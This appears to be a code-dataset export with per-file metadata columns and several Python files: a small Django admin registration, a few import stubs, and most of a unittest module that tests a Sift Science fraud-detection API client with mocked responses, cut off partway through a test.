| 0.878991
| 0.859309
| 0.808573
| 0.771541
| 0.725762
| 0
| 0.061101
| 0.230879
| 10,512
| 299
| 113
| 35.157191
| 0.78726
| 0.00704
| 0
| 0.698113
| 0
| 0
| 0.208837
| 0.157945
| 0
| 0
| 0
| 0
| 0.056604
| 1
| 0.089623
| false
| 0
| 0.04717
| 0
| 0.160377
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f0e5b02f56e865ced4cd2a59e2fd6e5f868cad09
| 146
|
py
|
Python
|
client_wishlist/customers/admin.py
|
EVolpert/client_whishlist
|
b2da64a53e978bc77bc4fb9a8c9b9dc4af66c5b1
|
[
"CC0-1.0"
] | null | null | null |
client_wishlist/customers/admin.py
|
EVolpert/client_whishlist
|
b2da64a53e978bc77bc4fb9a8c9b9dc4af66c5b1
|
[
"CC0-1.0"
] | 5
|
2021-03-30T14:20:02.000Z
|
2021-09-22T19:29:15.000Z
|
client_wishlist/customers/admin.py
|
EVolpert/client_whishlist
|
b2da64a53e978bc77bc4fb9a8c9b9dc4af66c5b1
|
[
"CC0-1.0"
] | 1
|
2020-08-18T16:35:12.000Z
|
2020-08-18T16:35:12.000Z
|
from django.contrib import admin
from customers.models import Customer
@admin.register(Customer)
class CustomerAdmin(admin.ModelAdmin):
pass
| 20.857143
| 38
| 0.815068
| 18
| 146
| 6.611111
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116438
| 146
| 7
| 39
| 20.857143
| 0.922481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0b10f714d2e6e68f9180c75d1a5b01bd5eb32248
| 19
|
py
|
Python
|
app/models/__init__.py
|
jscottcronin/recommender_deployed
|
6579e751e368c0478020bd15cbf1f98bc99a14e9
|
[
"MIT"
] | 1
|
2018-04-24T17:25:39.000Z
|
2018-04-24T17:25:39.000Z
|
app/models/__init__.py
|
jscottcronin/recommender_deployed
|
6579e751e368c0478020bd15cbf1f98bc99a14e9
|
[
"MIT"
] | null | null | null |
app/models/__init__.py
|
jscottcronin/recommender_deployed
|
6579e751e368c0478020bd15cbf1f98bc99a14e9
|
[
"MIT"
] | null | null | null |
from .fm import FM
| 9.5
| 18
| 0.736842
| 4
| 19
| 3.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 19
| 1
| 19
| 19
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9bc2489c04f09d77214a76e5db78d5ccd66ea68a
| 34
|
py
|
Python
|
api/__init__.py
|
ticet11/AbBOT-api
|
355bcf19a18a12692f544c9d968637681597d6ba
|
[
"MIT"
] | 11
|
2021-09-04T02:24:38.000Z
|
2022-02-28T19:03:44.000Z
|
api/__init__.py
|
ramblingjordan/AbBOT-api
|
36217744444629ecdb134e01fe838e8eea92d4bf
|
[
"MIT"
] | 12
|
2021-09-04T15:15:04.000Z
|
2021-09-20T22:07:27.000Z
|
api/__init__.py
|
ticet11/AbBOT-api
|
355bcf19a18a12692f544c9d968637681597d6ba
|
[
"MIT"
] | 11
|
2021-09-04T02:25:53.000Z
|
2021-09-06T15:50:56.000Z
|
from .server import start_server
| 17
| 33
| 0.823529
| 5
| 34
| 5.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147059
| 34
| 1
| 34
| 34
| 0.931034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5019523e9735ebef1ed9ba94ec8b5edd4bf93212
| 33
|
py
|
Python
|
trunk/VyPy/optimize/Remember.py
|
jiaxu825/VyPy
|
47100bad9dea46f12cb8bfa1ba86886e06f5c85d
|
[
"BSD-3-Clause"
] | 3
|
2015-01-22T02:03:14.000Z
|
2022-03-15T21:50:50.000Z
|
trunk/VyPy/optimize/Remember.py
|
jiaxu825/VyPy
|
47100bad9dea46f12cb8bfa1ba86886e06f5c85d
|
[
"BSD-3-Clause"
] | 3
|
2015-02-06T19:12:04.000Z
|
2015-05-01T10:04:12.000Z
|
trunk/VyPy/optimize/Remember.py
|
jiaxu825/VyPy
|
47100bad9dea46f12cb8bfa1ba86886e06f5c85d
|
[
"BSD-3-Clause"
] | 1
|
2020-09-25T13:26:54.000Z
|
2020-09-25T13:26:54.000Z
|
from ..parallel import Remember
| 16.5
| 31
| 0.787879
| 4
| 33
| 6.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 33
| 2
| 31
| 16.5
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5042a06143047456fa02c483ab55d867a33a9b87
| 50,254
|
py
|
Python
|
tests/test_client.py
|
jyothish6190/sift-python
|
a3dbfc5f043e4992ed6aa977da579fab49001cb4
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
jyothish6190/sift-python
|
a3dbfc5f043e4992ed6aa977da579fab49001cb4
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
jyothish6190/sift-python
|
a3dbfc5f043e4992ed6aa977da579fab49001cb4
|
[
"MIT"
] | null | null | null |
import datetime
import warnings
import json
import mock
import sift
import unittest
import sys
import requests.exceptions
if sys.version_info[0] < 3:
import urllib
else:
import urllib.parse as urllib
def valid_transaction_properties():
return {
'$buyer_user_id': '123456',
'$seller_user_id': '654321',
'$amount': 1253200,
'$currency_code': 'USD',
'$time': int(datetime.datetime.now().strftime('%s')),
'$transaction_id': 'my_transaction_id',
'$billing_name': 'Mike Snow',
'$billing_bin': '411111',
'$billing_last4': '1111',
'$billing_address1': '123 Main St.',
'$billing_city': 'San Francisco',
'$billing_region': 'CA',
'$billing_country': 'US',
'$billing_zip': '94131',
'$user_email': 'mike@example.com'
}
def valid_label_properties():
return {
'$abuse_type': 'content_abuse',
'$is_bad': True,
'$description': 'Listed a fake item',
'$source': 'Internal Review Queue',
'$analyst': 'super.sleuth@example.com'
}
def score_response_json():
return """{
"status": 0,
"error_message": "OK",
"user_id": "12345",
"score": 0.85,
"latest_label": {
"is_bad": true,
"time": 1450201660000
},
"scores": {
"content_abuse": {
"score": 0.14
},
"payment_abuse": {
"score": 0.97
}
},
"latest_labels": {
"promotion_abuse": {
"is_bad": false,
"time": 1457201099000
},
"payment_abuse": {
"is_bad": true,
"time": 1457212345000
}
}
}"""
# A sample response from the /{version}/users/{userId}/score API.
USER_SCORE_RESPONSE_JSON = """{
"status": 0,
"error_message": "OK",
"entity_type": "user",
"entity_id": "12345",
"scores": {
"content_abuse": {
"score": 0.14
},
"payment_abuse": {
"score": 0.97
}
},
"latest_decisions": {
"payment_abuse": {
"id": "user_looks_bad_payment_abuse",
"category": "block",
"source": "AUTOMATED_RULE",
"time": 1352201880,
"description": "Bad Fraudster"
}
},
"latest_labels": {
"promotion_abuse": {
"is_bad": false,
"time": 1457201099000
},
"payment_abuse": {
"is_bad": true,
"time": 1457212345000
}
}
}"""
def action_response_json():
return """{
"actions": [
{
"action": {
"id": "freds_action"
},
"entity": {
"id": "Fred"
},
"id": "ACTION1234567890:freds_action",
"triggers": [
{
"source": "synchronous_action",
"trigger": {
"id": "TRIGGER1234567890"
},
"type": "formula"
}
]
}
],
"score": 0.85,
"status": 0,
"error_message": "OK",
"user_id": "Fred",
"scores": {
"content_abuse": {
"score": 0.14
},
"payment_abuse": {
"score": 0.97
}
},
"latest_labels": {
"promotion_abuse": {
"is_bad": false,
"time": 1457201099000
},
"payment_abuse": {
"is_bad": true,
"time": 1457212345000
}
}
}"""
def response_with_data_header():
return {
'content-type': 'application/json; charset=UTF-8'
}
class TestSiftPythonClient(unittest.TestCase):
def setUp(self):
self.test_key = 'a_fake_test_api_key'
self.account_id = 'ACCT'
self.sift_client = sift.Client(api_key=self.test_key, account_id=self.account_id)
def test_global_api_key(self):
# test for error if global key is undefined
self.assertRaises(TypeError, sift.Client)
sift.api_key = "a_test_global_api_key"
local_api_key = "a_test_local_api_key"
client1 = sift.Client()
client2 = sift.Client(local_api_key)
# test that global api key is assigned
assert(client1.api_key == sift.api_key)
# test that local api key is assigned
assert(client2.api_key == local_api_key)
client2 = sift.Client()
# test that client2 is assigned a new object with global api_key
assert(client2.api_key == sift.api_key)
def test_constructor_requires_valid_api_key(self):
self.assertRaises(TypeError, sift.Client, None)
self.assertRaises(ValueError, sift.Client, '')
def test_constructor_invalid_api_url(self):
self.assertRaises(TypeError, sift.Client, self.test_key, None)
self.assertRaises(ValueError, sift.Client, self.test_key, '')
def test_constructor_api_key(self):
client = sift.Client(self.test_key)
self.assertEqual(client.api_key, self.test_key)
def test_track_requires_valid_event(self):
self.assertRaises(TypeError, self.sift_client.track, None, {})
self.assertRaises(ValueError, self.sift_client.track, '', {})
self.assertRaises(TypeError, self.sift_client.track, 42, {})
def test_track_requires_properties(self):
event = 'custom_event'
self.assertRaises(TypeError, self.sift_client.track, event, None)
self.assertRaises(TypeError, self.sift_client.track, event, 42)
self.assertRaises(ValueError, self.sift_client.track, event, {})
def test_score_requires_user_id(self):
self.assertRaises(TypeError, self.sift_client.score, None)
self.assertRaises(ValueError, self.sift_client.score, '')
self.assertRaises(TypeError, self.sift_client.score, 42)
def test_event_ok(self):
event = '$transaction'
mock_response = mock.Mock()
mock_response.content = '{"status": 0, "error_message": "OK"}'
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.track(event, valid_transaction_properties())
mock_post.assert_called_with(
'https://api.siftscience.com/v205/events',
data=mock.ANY,
headers=mock.ANY,
timeout=mock.ANY,
params={})
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_status == 0)
assert(response.api_error_message == "OK")
def test_event_with_timeout_param_ok(self):
event = '$transaction'
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = '{"status": 0, "error_message": "OK"}'
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.track(
event, valid_transaction_properties(), timeout=test_timeout)
mock_post.assert_called_with(
'https://api.siftscience.com/v205/events',
data=mock.ANY,
headers=mock.ANY,
timeout=test_timeout,
params={})
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_status == 0)
assert(response.api_error_message == "OK")
def test_score_ok(self):
mock_response = mock.Mock()
mock_response.content = score_response_json()
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.score('12345')
mock_get.assert_called_with(
'https://api.siftscience.com/v205/score/12345',
params={'api_key': self.test_key},
headers=mock.ANY,
timeout=mock.ANY)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['score'] == 0.85)
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
def test_score_with_timeout_param_ok(self):
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = score_response_json()
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.score('12345', test_timeout)
mock_get.assert_called_with(
'https://api.siftscience.com/v205/score/12345',
params={'api_key': self.test_key},
headers=mock.ANY,
timeout=test_timeout)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['score'] == 0.85)
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
def test_get_user_score_ok(self):
"""Test the GET /{version}/users/{userId}/score API, i.e. client.get_user_score()
"""
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = USER_SCORE_RESPONSE_JSON
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.get_user_score('12345', test_timeout)
mock_get.assert_called_with(
'https://api.siftscience.com/v205/users/12345/score',
params={'api_key': self.test_key},
headers=mock.ANY,
timeout=test_timeout)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['entity_id'] == '12345')
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
assert('latest_decisions' in response.body)
def test_get_user_score_with_abuse_types_ok(self):
"""Test the GET /{version}/users/{userId}/score?abuse_types=... API, i.e. client.get_user_score()
"""
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = USER_SCORE_RESPONSE_JSON
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.get_user_score('12345',
abuse_types=['payment_abuse', 'content_abuse'],
timeout=test_timeout)
mock_get.assert_called_with(
'https://api.siftscience.com/v205/users/12345/score',
params={'api_key': self.test_key, 'abuse_types': 'payment_abuse,content_abuse'},
headers=mock.ANY,
timeout=test_timeout)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['entity_id'] == '12345')
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
assert('latest_decisions' in response.body)
def test_rescore_user_ok(self):
"""Test the POST /{version}/users/{userId}/score API, i.e. client.rescore_user()
"""
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = USER_SCORE_RESPONSE_JSON
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.rescore_user('12345', test_timeout)
mock_post.assert_called_with(
'https://api.siftscience.com/v205/users/12345/score',
params={'api_key': self.test_key},
headers=mock.ANY,
timeout=test_timeout)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['entity_id'] == '12345')
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
assert('latest_decisions' in response.body)
def test_rescore_user_with_abuse_types_ok(self):
"""Test the POST /{version}/users/{userId}/score?abuse_types=... API, i.e. client.rescore_user()
"""
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = USER_SCORE_RESPONSE_JSON
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.rescore_user('12345',
abuse_types=['payment_abuse', 'content_abuse'],
timeout=test_timeout)
mock_post.assert_called_with(
'https://api.siftscience.com/v205/users/12345/score',
params={'api_key': self.test_key, 'abuse_types': 'payment_abuse,content_abuse'},
headers=mock.ANY,
timeout=test_timeout)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['entity_id'] == '12345')
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
assert('latest_decisions' in response.body)
def test_sync_score_ok(self):
event = '$transaction'
mock_response = mock.Mock()
mock_response.content = ('{"status": 0, "error_message": "OK", "score_response": %s}'
% score_response_json())
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.track(
event,
valid_transaction_properties(),
return_score=True,
abuse_types=['payment_abuse', 'content_abuse', 'legacy'])
mock_post.assert_called_with(
'https://api.siftscience.com/v205/events',
data=mock.ANY,
headers=mock.ANY,
timeout=mock.ANY,
params={'return_score': 'true', 'abuse_types': 'payment_abuse,content_abuse,legacy'})
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_status == 0)
assert(response.api_error_message == "OK")
assert(response.body['score_response']['score'] == 0.85)
assert(response.body['score_response']['scores']['content_abuse']['score'] == 0.14)
assert(response.body['score_response']['scores']['payment_abuse']['score'] == 0.97)
def test_get_decisions_fails(self):
with self.assertRaises(ValueError):
self.sift_client.get_decisions('usr')
def test_get_decisions(self):
mock_response = mock.Mock()
get_decisions_response_json = """
{
"data": [
{
"id": "block_user",
"name": "Block user",
"description": "user has a different billing and shipping addresses",
"entity_type": "user",
"abuse_type": "legacy",
"category": "block",
"webhook_url": "http://web.hook",
"created_at": "1468005577348",
"created_by": "admin@biz.com",
"updated_at": "1469229177756",
"updated_by": "analyst@biz.com"
}
],
"has_more": "true",
"next_ref": "v3/accounts/accountId/decisions"
}
"""
mock_response.content = get_decisions_response_json
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.get_decisions(entity_type="user",
limit=10,
start_from=None,
abuse_types="legacy,payment_abuse",
timeout=3)
mock_get.assert_called_with(
'https://api3.siftscience.com/v3/accounts/ACCT/decisions',
headers=mock.ANY,
auth=mock.ANY,
params={'entity_type': 'user', 'limit': 10, 'abuse_types': 'legacy,payment_abuse'},
timeout=3)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.body['data'][0]['id'] == 'block_user')
def test_get_decisions_entity_session(self):
mock_response = mock.Mock()
get_decisions_response_json = """
{
"data": [
{
"id": "block_session",
"name": "Block session",
"description": "session has problems",
"entity_type": "session",
"abuse_type": "legacy",
"category": "block",
"webhook_url": "http://web.hook",
"created_at": "1468005577348",
"created_by": "admin@biz.com",
"updated_at": "1469229177756",
"updated_by": "analyst@biz.com"
}
],
"has_more": "true",
"next_ref": "v3/accounts/accountId/decisions"
}
"""
mock_response.content = get_decisions_response_json
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.get_decisions(entity_type="session",
limit=10,
start_from=None,
abuse_types="account_takeover",
timeout=3)
mock_get.assert_called_with(
'https://api3.siftscience.com/v3/accounts/ACCT/decisions',
headers=mock.ANY,
auth=mock.ANY,
params={'entity_type': 'session', 'limit': 10, 'abuse_types': 'account_takeover'},
timeout=3)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.body['data'][0]['id'] == 'block_session')
def test_apply_decision_to_user_ok(self):
user_id = '54321'
mock_response = mock.Mock()
apply_decision_request = {
'decision_id': 'user_looks_ok_legacy',
'source': 'MANUAL_REVIEW',
'analyst': 'analyst@biz.com',
'description': 'called user and verified account',
'time': 1481569575
}
apply_decision_response_json = """
{
"entity": {
"id": "54321",
"type": "user"
},
"decision": {
"id": "user_looks_ok_legacy"
},
"time": "1481569575"
}
"""
mock_response.content = apply_decision_response_json
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.apply_user_decision(user_id, apply_decision_request)
data = json.dumps(apply_decision_request)
mock_post.assert_called_with(
'https://api3.siftscience.com/v3/accounts/ACCT/users/%s/decisions' % user_id,
auth=mock.ANY, data=data, headers=mock.ANY, timeout=mock.ANY)
self.assertIsInstance(response, sift.client.Response)
assert(response.body['entity']['type'] == 'user')
assert(response.http_status_code == 200)
assert(response.is_ok())
def test_validate_no_user_id_string_fails(self):
apply_decision_request = {
'decision_id': 'user_looks_ok_legacy',
'source': 'MANUAL_REVIEW',
'analyst': 'analyst@biz.com',
'description': 'called user and verified account',
}
with self.assertRaises(TypeError):
self.sift_client._validate_apply_decision_request(apply_decision_request, 123)
def test_apply_decision_to_order_fails_with_no_order_id(self):
with self.assertRaises(TypeError):
self.sift_client.apply_order_decision("user_id", None, {})
def test_apply_decision_to_session_fails_with_no_session_id(self):
with self.assertRaises(TypeError):
self.sift_client.apply_session_decision("user_id", None, {})
def test_get_session_decisions_fails_with_no_session_id(self):
with self.assertRaises(TypeError):
self.sift_client.get_session_decisions("user_id", None)
def test_apply_decision_to_content_fails_with_no_content_id(self):
with self.assertRaises(TypeError):
self.sift_client.apply_content_decision("user_id", None, {})
def test_validate_apply_decision_request_no_analyst_fails(self):
apply_decision_request = {
'decision_id': 'user_looks_ok_legacy',
'source': 'MANUAL_REVIEW',
'time': 1481569575
}
with self.assertRaises(ValueError):
self.sift_client._validate_apply_decision_request(apply_decision_request, "userId")
def test_validate_apply_decision_request_no_source_fails(self):
apply_decision_request = {
'decision_id': 'user_looks_ok_legacy',
'time': 1481569575
}
with self.assertRaises(ValueError):
self.sift_client._validate_apply_decision_request(apply_decision_request, "userId")
def test_validate_empty_apply_decision_request_fails(self):
apply_decision_request = {}
with self.assertRaises(ValueError):
self.sift_client._validate_apply_decision_request(apply_decision_request, "userId")
def test_apply_decision_manual_review_no_analyst_fails(self):
user_id = '54321'
apply_decision_request = {
'decision_id': 'user_looks_ok_legacy',
'source': 'MANUAL_REVIEW',
'time': 1481569575
}
with self.assertRaises(ValueError):
self.sift_client.apply_user_decision(user_id, apply_decision_request)
def test_apply_decision_no_source_fails(self):
user_id = '54321'
apply_decision_request = {
'decision_id': 'user_looks_ok_legacy',
'time': 1481569575
}
with self.assertRaises(ValueError):
self.sift_client.apply_user_decision(user_id, apply_decision_request)
def test_apply_decision_invalid_source_fails(self):
user_id = '54321'
apply_decision_request = {
'decision_id': 'user_looks_ok_legacy',
'source': 'INVALID_SOURCE',
'time': 1481569575
}
self.assertRaises(ValueError, self.sift_client.apply_user_decision, user_id, apply_decision_request)
def test_apply_decision_to_order_ok(self):
user_id = '54321'
order_id = '43210'
mock_response = mock.Mock()
apply_decision_request = {
'decision_id': 'order_looks_bad_payment_abuse',
'source': 'AUTOMATED_RULE',
'time': 1481569575
}
apply_decision_response_json = """
{
"entity": {
"id": "54321",
"type": "order"
},
"decision": {
"id": "order_looks_bad_payment_abuse"
},
"time": "1481569575"
}
"""
mock_response.content = apply_decision_response_json
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.apply_order_decision(user_id, order_id, apply_decision_request)
data = json.dumps(apply_decision_request)
mock_post.assert_called_with(
'https://api3.siftscience.com/v3/accounts/ACCT/users/%s/orders/%s/decisions' % (user_id, order_id),
auth=mock.ANY, data=data, headers=mock.ANY, timeout=mock.ANY)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.http_status_code == 200)
assert(response.body['entity']['type'] == 'order')
def test_apply_decision_to_session_ok(self):
user_id = '54321'
session_id = 'gigtleqddo84l8cm15qe4il'
mock_response = mock.Mock()
apply_decision_request = {
'decision_id': 'session_looks_bad_ato',
'source': 'AUTOMATED_RULE',
'time': 1481569575
}
apply_decision_response_json = """
{
"entity": {
"id": "54321",
"type": "login"
},
"decision": {
"id": "session_looks_bad_ato"
},
"time": "1481569575"
}
"""
mock_response.content = apply_decision_response_json
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.apply_session_decision(user_id, session_id, apply_decision_request)
data = json.dumps(apply_decision_request)
mock_post.assert_called_with(
'https://api3.siftscience.com/v3/accounts/ACCT/users/%s/sessions/%s/decisions' % (user_id, session_id),
auth=mock.ANY, data=data, headers=mock.ANY, timeout=mock.ANY)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.http_status_code == 200)
assert(response.body['entity']['type'] == 'login')
def test_apply_decision_to_content_ok(self):
user_id = '54321'
content_id = 'listing-1231'
mock_response = mock.Mock()
apply_decision_request = {
'decision_id': 'content_looks_bad_content_abuse',
'source': 'AUTOMATED_RULE',
'time': 1481569575
}
apply_decision_response_json = """
{
"entity": {
"id": "54321",
"type": "create_content"
},
"decision": {
"id": "content_looks_bad_content_abuse"
},
"time": "1481569575"
}
"""
mock_response.content = apply_decision_response_json
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.apply_content_decision(user_id, content_id, apply_decision_request)
data = json.dumps(apply_decision_request)
mock_post.assert_called_with(
'https://api3.siftscience.com/v3/accounts/ACCT/users/%s/content/%s/decisions' % (user_id, content_id),
auth=mock.ANY, data=data, headers=mock.ANY, timeout=mock.ANY)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.http_status_code == 200)
assert(response.body['entity']['type'] == 'create_content')
def test_label_user_ok(self):
user_id = '54321'
mock_response = mock.Mock()
mock_response.content = '{"status": 0, "error_message": "OK"}'
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.label(user_id, valid_label_properties())
properties = {
'$abuse_type': 'content_abuse',
'$is_bad': True,
'$description': 'Listed a fake item',
'$source': 'Internal Review Queue',
'$analyst': 'super.sleuth@example.com'
}
properties.update({'$api_key': self.test_key, '$type': '$label'})
data = json.dumps(properties)
mock_post.assert_called_with(
'https://api.siftscience.com/v205/users/%s/labels' % user_id,
data=data, headers=mock.ANY, timeout=mock.ANY, params={})
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_status == 0)
assert(response.api_error_message == "OK")
def test_label_user_with_timeout_param_ok(self):
user_id = '54321'
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = '{"status": 0, "error_message": "OK"}'
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.label(
user_id, valid_label_properties(), test_timeout)
properties = {
'$abuse_type': 'content_abuse',
'$is_bad': True,
'$description': 'Listed a fake item',
'$source': 'Internal Review Queue',
'$analyst': 'super.sleuth@example.com'
}
properties.update({'$api_key': self.test_key, '$type': '$label'})
data = json.dumps(properties)
mock_post.assert_called_with(
'https://api.siftscience.com/v205/users/%s/labels' % user_id,
data=data, headers=mock.ANY, timeout=test_timeout, params={})
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_status == 0)
assert(response.api_error_message == "OK")
def test_unlabel_user_ok(self):
user_id = '54321'
mock_response = mock.Mock()
mock_response.status_code = 204
with mock.patch.object(self.sift_client.session, 'delete') as mock_delete:
mock_delete.return_value = mock_response
response = self.sift_client.unlabel(user_id, abuse_type='account_abuse')
mock_delete.assert_called_with(
'https://api.siftscience.com/v205/users/%s/labels' % user_id,
headers=mock.ANY,
timeout=mock.ANY,
params={'api_key': self.test_key, 'abuse_type': 'account_abuse'})
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
def test_unicode_string_parameter_support(self):
# str is unicode in python 3, so no need to check as this was covered
# by other unit tests.
if sys.version_info[0] < 3:
